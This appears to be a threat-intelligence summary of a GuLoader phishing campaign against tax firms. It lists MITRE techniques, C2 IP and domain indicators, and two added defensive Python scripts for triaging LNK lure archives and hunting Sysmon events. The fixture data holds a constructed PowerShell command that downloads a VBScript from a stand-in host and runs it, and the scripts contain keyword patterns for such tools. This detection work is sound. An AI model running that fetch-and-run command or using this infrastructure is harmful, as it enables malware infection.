Tax accounting firms and CPAs are being targeted during peak tax season with a precision malware attack that delivers GuLoader through social engineering and a Windows Shortcut (LNK) lure. The operation starts with a deceptive email, followed by a password-protected ZIP containing a Windows Shortcut disguised as a PDF alongside decoy files; the shortcut fetches an obfuscated VBScript, which leads to in-memory PowerShell payloads, process hollowing and active C2 communication. #GuLoader #newmansubzero #TaxFirms
Keypoints
- Attack targets tax preparation firms (Sophos customers) during peak US tax season.
- Initial contact is a social-engineering email with a benign-looking solicitation, then a follow-up linking to a password-protected ZIP hosted in cloud storage (the password keeps mail gateways from inspecting the archive).
- The ZIP contains a Windows Shortcut (LNK) and decoy files (screenshot1242.jpeg, privatecopy.pdf); the LNK carries a PDF suffix in its name so it displays as a PDF, and double-clicking it leads to code execution.
- That code runs PowerShell (Invoke-WebRequest) to fetch a heavily obfuscated VBScript of more than 200KB into C:\Windows\Tasks\; the VBS decodes and executes PowerShell that loads the final payload into memory from a Registry value, never writing the payload to disk.
- The payload is injected into ielowutil.exe by process hollowing, and persistence is a Registry Run key (named Overproduce) that re-launches PowerShell at every reboot.
- C2 communication goes to three IP:port pairs and one domain: 64.44.101.171:9191, 84.21.172.49:1040, 185.225.74.91:2080 and newmansubzero.com.
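As an added example (not code from the Sophos write-up), the triage below shows how to screen an extracted lure archive like this one for the shortcut-disguised-as-PDF trick: a `.lnk` entry whose name carries a document suffix in front of the `.lnk` that Explorer never displays, the MS-SHLLINK header magic (which catches a shortcut even when it is renamed to something else), and PowerShell or download keywords in the shortcut's argument string. The archive, the decoy contents, the shortcut name `Client Tax Documents.pdf.lnk`, the 203.0.113.10 download host and the eight-letter `abcdefgh.vbs` file name are all constructed for the example; only the decoy file names, `fordl.vbs` and the `C:\Windows\Tasks` drop path come from the summary. Python's `zipfile` cannot write ZipCrypto archives, so the sample is built unencrypted; `triage()` still accepts the password for a real extraction.

```python
"""Triage an extracted lure Zip for a Windows Shortcut posing as a document.
Added example, not Sophos code; the archive and LNK bytes are constructed."""
import io
import re
import zipfile
from typing import Dict, List, Optional

# Suffixes a user expects on a document. Explorer never shows .lnk (NeverShowExt),
# so "x.pdf.lnk" is displayed as "x.pdf" regardless of the hide-extensions setting.
DOC_SUFFIXES = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpeg", ".jpg", ".png", ".txt"}

# MS-SHLLINK ShellLinkHeader: HeaderSize 0x0000004C, then LinkCLSID
# {00021401-0000-0000-C000-000000000046}, both little-endian on disk.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c0000000" "00000046")

# Keywords that have no business in a shortcut a client sends to an accountant.
SUSPICIOUS_ARGS = re.compile(
    r"(powershell|pwsh|cmd\.exe|mshta|wscript|cscript|invoke-webrequest|iwr|-enc|hidden)", re.I)


def fake_lnk(args: str) -> bytes:
    """Constructed stand-in for a shortcut: a valid 0x4C-byte header followed by
    the arguments the way a real LNK stores COMMAND_LINE_ARGUMENTS (UTF-16LE).
    It is not a loadable shortcut; it only exercises the checks below."""
    header = LNK_MAGIC + b"\x00" * (0x4C - len(LNK_MAGIC))
    return header + args.encode("utf-16-le")


def build_archive(entries: Dict[str, bytes]) -> bytes:
    """Write an in-memory Zip (unencrypted: zipfile cannot produce ZipCrypto)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_lure() -> bytes:
    """Constructed look-alike of the lure: two decoys (names from the summary)
    plus a shortcut whose name ends in .pdf.lnk. The download host 203.0.113.10
    and the eight-letter VBS name are invented; fordl.vbs and the Tasks path
    are from the summary."""
    return build_archive({
        "screenshot1242.jpeg": b"\xff\xd8\xff\xe0" + b"\x00" * 64,
        "privatecopy.pdf": b"%PDF-1.4\n% decoy\n",
        "Client Tax Documents.pdf.lnk": fake_lnk(
            'powershell -w hidden -c "Invoke-WebRequest http://203.0.113.10/fresh/fordl.vbs '
            '-OutFile C:\\Windows\\Tasks\\abcdefgh.vbs; wscript C:\\Windows\\Tasks\\abcdefgh.vbs"'),
    })


def triage(zip_bytes: bytes, password: Optional[bytes] = None) -> List[dict]:
    """Return one finding per suspicious entry: shortcut by name, shortcut by
    header magic (even under a non-.lnk name), double extension, risky arguments."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            lower = name.lower()
            parts = lower.rsplit(".", 2)          # ["client tax documents", "pdf", "lnk"]
            data = zf.read(info, pwd=password)
            reasons = []
            if lower.endswith(".lnk"):
                reasons.append("Windows shortcut inside a document archive")
                if len(parts) == 3 and "." + parts[1] in DOC_SUFFIXES:
                    reasons.append(f"double extension: Explorer shows it as '{name[:-4]}'")
            if data.startswith(LNK_MAGIC):
                if not lower.endswith(".lnk"):
                    reasons.append("LNK header under a non-.lnk name")
                # Real shortcuts store strings as UTF-16LE when IsUnicode is set,
                # otherwise ANSI; scan both decodings of the body after the header.
                body = data[0x4C:]
                text = body.decode("utf-16-le", errors="ignore") + body.decode("latin-1")
                hits = sorted({h.lower() for h in SUSPICIOUS_ARGS.findall(text)})
                if hits:
                    reasons.append("arguments reference: " + ", ".join(hits))
            if reasons:
                findings.append({"name": name, "size": info.file_size, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(build_lure()):
        print(f["name"], f["size"], *f["reasons"], sep="\n  ")
```

The magic-byte check matters more than the name check: an attacker who drops the `.pdf.lnk` trick and ships a shortcut under a plain `.pdf` name is still caught by the header, while a real PDF (which starts with `%PDF`) never is.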
MITRE Techniques
- [T1566.002] Phishing: Spearphishing via Link – The attacker uses an email solicitation and a follow-up with a link to a password-protected Zip file hosted on cloud storage. “The initial message to the target is benign, with a subject line of Prospective Client Enquiries … The attacker then sends a follow-up email with a link to a password-protected Zip file hosted on a cloud storage service.”
- [T1204.002] User Execution: Malicious File – The target double-clicks a Windows Shortcut (.LNK) that is disguised as a PDF and triggers further actions. “The target would then, naturally, double click the other file in the Zip archive — a Windows Shortcut (.LNK) labeled with a PDF file suffix…”
- [T1059.005] Command and Scripting Interpreter: Visual Basic – The initial infector is a heavily obfuscated Visual Basic Script that decodes and executes commands. “A heavily obfuscated, and very large at more than 200KB in size” … “The VBS contains two large variables … and execute PowerShell commands.”
- [T1059.001] Command and Scripting Interpreter: PowerShell – The decoded PowerShell script loads the final payload into memory and executes it without writing to disk. “The PowerShell script decoded from the Ir8 variable uses Reflection.Assembly to load the final payload into memory from a Registry value without writing it to disk.”
- [T1105] Ingress Tool Transfer – PowerShell launched by the shortcut pulls the VBScript from a remote URL (the host written as a hex-encoded IP address) into C:\Windows\Tasks\ to begin the infection chain. “Invoke-WebRequest http://0x[two hex bytes]…/fresh/fordl.vbs -OutFile C:\Windows\Tasks\[eight letters].vbs”
- [T1055.012] Process Injection: Process Hollowing – The malware injects into ielowutil.exe using process hollowing. “the malware injected itself, using process hollowing, into ielowutil.exe”
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – The malware creates a Run key that invokes PowerShell on every reboot. “It created a Run key in the Registry named Overproduce that invokes the SaltoQ variable to run a PowerShell command at every reboot.”
- [T1071.001] Application Layer Protocol: Web Protocols (C2) – Infected hosts contact C2 servers on non-standard TCP ports to receive commands: 64.44.101.171:9191, 84.21.172.49:1040, 185.225.74.91:2080. “Once infected, the ielowutil.exe binary constantly attempts to contact its command-and-control server, on 64.44.101.171:9191.” and “live as of publication … 84.21.172.49:1040 and 185.225.74.91:2080.”
- [T1027] Obfuscated/Compressed Files and Information – The VBScript payload is heavily obfuscated with base64 blocks and encrypted data. “A block of base64-encoded, encrypted data comprises almost 150KB of that script, along with code that decodes and decrypts the block of base64.”
Indicators of Compromise
- [IP] 64.44.101.171:9191 – C2 server contacted by ielowutil.exe during infection.
- [IP] 84.21.172.49:1040 – C2 server observed in some samples.
- [IP] 185.225.74.91:2080 – C2 server observed in some samples.
- [Domain] newmansubzero.com – Domain used for C2 activity.
- [File] screenshot1242.jpeg – Decoy file name inside ZIP archive.
- [File] privatecopy.pdf – Another decoy file inside ZIP archive.
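Detection for the chain in the technique list and the indicators above, as an added example (not Sophos code): hunting rules over Sysmon-style process-creation (event 1), network-connection (event 3) and registry-value-set (event 13) records, matching both the behaviours (VBS drop into C:\Windows\Tasks, script host launch from that path, Run-key PowerShell persistence, ielowutil.exe talking to the network) and the IP:port and domain IOCs. The sample events are constructed here: the SID, the 203.0.113.10 download host, the eight-letter `qwertyui.vbs` name, the Run-key command text and the benign browser event are invented, while the C2 endpoints, the domain, `ielowutil.exe`, `fordl.vbs`, the Tasks path and the `Overproduce` value name come from the summary.

```python
"""Hunting rules for the GuLoader tax-firm chain over Sysmon-style events.
Added example; the events below are constructed, not real telemetry."""
import re
from typing import List, Tuple

# Network IOCs from the summary: (ip, port) pairs and the C2 domain.
C2_ENDPOINTS = {("64.44.101.171", 9191), ("84.21.172.49", 1040), ("185.225.74.91", 2080)}
C2_DOMAINS = {"newmansubzero.com"}

PS = r"c:\windows\system32\windowspowershell\v1.0\powershell.exe"
IE_LOWUTIL = r"c:\program files\internet explorer\ielowutil.exe"

# T1105: PowerShell fetching a .vbs into C:\Windows\Tasks (the drop path from the summary).
VBS_DROP = re.compile(r"invoke-webrequest.*-outfile\s+\S*\\windows\\tasks\\\S+\.vbs", re.I)
# T1059.005: a script host executing a VBS from that directory.
VBS_RUN = re.compile(r"\\windows\\tasks\\\S+\.vbs", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# T1547.001: a Run-key value whose data launches PowerShell.
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)
PS_LAUNCH = re.compile(r"powershell|pwsh|-enc|frombase64string", re.I)

# Constructed sample telemetry. The SID, 203.0.113.10, qwertyui.vbs, the Run-key
# command and the browser event are invented; the rest mirrors the summary.
SAMPLE_EVENTS = [
    {"id": 1, "image": PS, "parent": r"c:\windows\explorer.exe",
     "cmdline": r'powershell -w hidden -c "Invoke-WebRequest http://203.0.113.10/fresh/fordl.vbs '
                r'-OutFile C:\Windows\Tasks\qwertyui.vbs"'},
    {"id": 1, "image": r"c:\windows\system32\wscript.exe", "parent": PS,
     "cmdline": r"wscript.exe C:\Windows\Tasks\qwertyui.vbs"},
    {"id": 13, "image": PS,
     "target": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft"
               r"\Windows\CurrentVersion\Run\Overproduce",
     "details": r'powershell -w hidden -c "& $SaltoQ"'},
    {"id": 3, "image": IE_LOWUTIL, "dest_ip": "64.44.101.171", "dest_port": 9191, "dest_host": ""},
    {"id": 3, "image": IE_LOWUTIL, "dest_ip": "185.225.74.91", "dest_port": 2080, "dest_host": ""},
    # benign activity that must not fire
    {"id": 1, "image": PS, "parent": r"c:\windows\explorer.exe", "cmdline": "powershell Get-Process"},
    {"id": 3, "image": r"c:\program files\browser\browser.exe",
     "dest_ip": "198.51.100.7", "dest_port": 443, "dest_host": "www.example.com"},
]

Finding = Tuple[int, str, str]  # (event index, MITRE technique, description)


def hunt(events: List[dict]) -> List[Finding]:
    """Apply the behavioural rules and IOC matches; several can fire on one event."""
    findings: List[Finding] = []
    for i, ev in enumerate(events):
        exe = ev.get("image", "").lower().rsplit("\\", 1)[-1]
        if ev["id"] == 1:
            cmd = ev.get("cmdline", "")
            if exe.startswith("powershell") and VBS_DROP.search(cmd):
                findings.append((i, "T1105", "PowerShell downloads a .vbs into C:\\Windows\\Tasks"))
            if exe in SCRIPT_HOSTS and VBS_RUN.search(cmd):
                findings.append((i, "T1059.005", "script host runs a VBS from C:\\Windows\\Tasks"))
        elif ev["id"] == 13:
            if RUN_KEY.search(ev.get("target", "")) and PS_LAUNCH.search(ev.get("details", "")):
                findings.append((i, "T1547.001", "Run key value launches PowerShell"))
        elif ev["id"] == 3:
            dest = (ev.get("dest_ip"), ev.get("dest_port"))
            host = ev.get("dest_host", "").lower().rstrip(".")
            if dest in C2_ENDPOINTS or host in C2_DOMAINS:
                findings.append((i, "T1071.001", f"connection to known GuLoader C2 {dest[0]}:{dest[1]}"))
            if exe == "ielowutil.exe":
                # ielowutil.exe is the hollowing host; it has no reason to reach raw IP:port endpoints.
                findings.append((i, "T1055.012", "ielowutil.exe makes an outbound connection"))
    return findings


if __name__ == "__main__":
    for idx, technique, why in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: [{technique}] {why}")
```

The behavioural rules are the durable part: the IP:port pairs rotate (two of the three were only "live as of publication"), but a PowerShell process writing a `.vbs` under `C:\Windows\Tasks`, a script host running from there, and `ielowutil.exe` opening sockets at all will survive an infrastructure change.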
Read more: https://news.sophos.com/en-us/2023/04/13/tax-firms-targeted-by-precision-malware-attacks/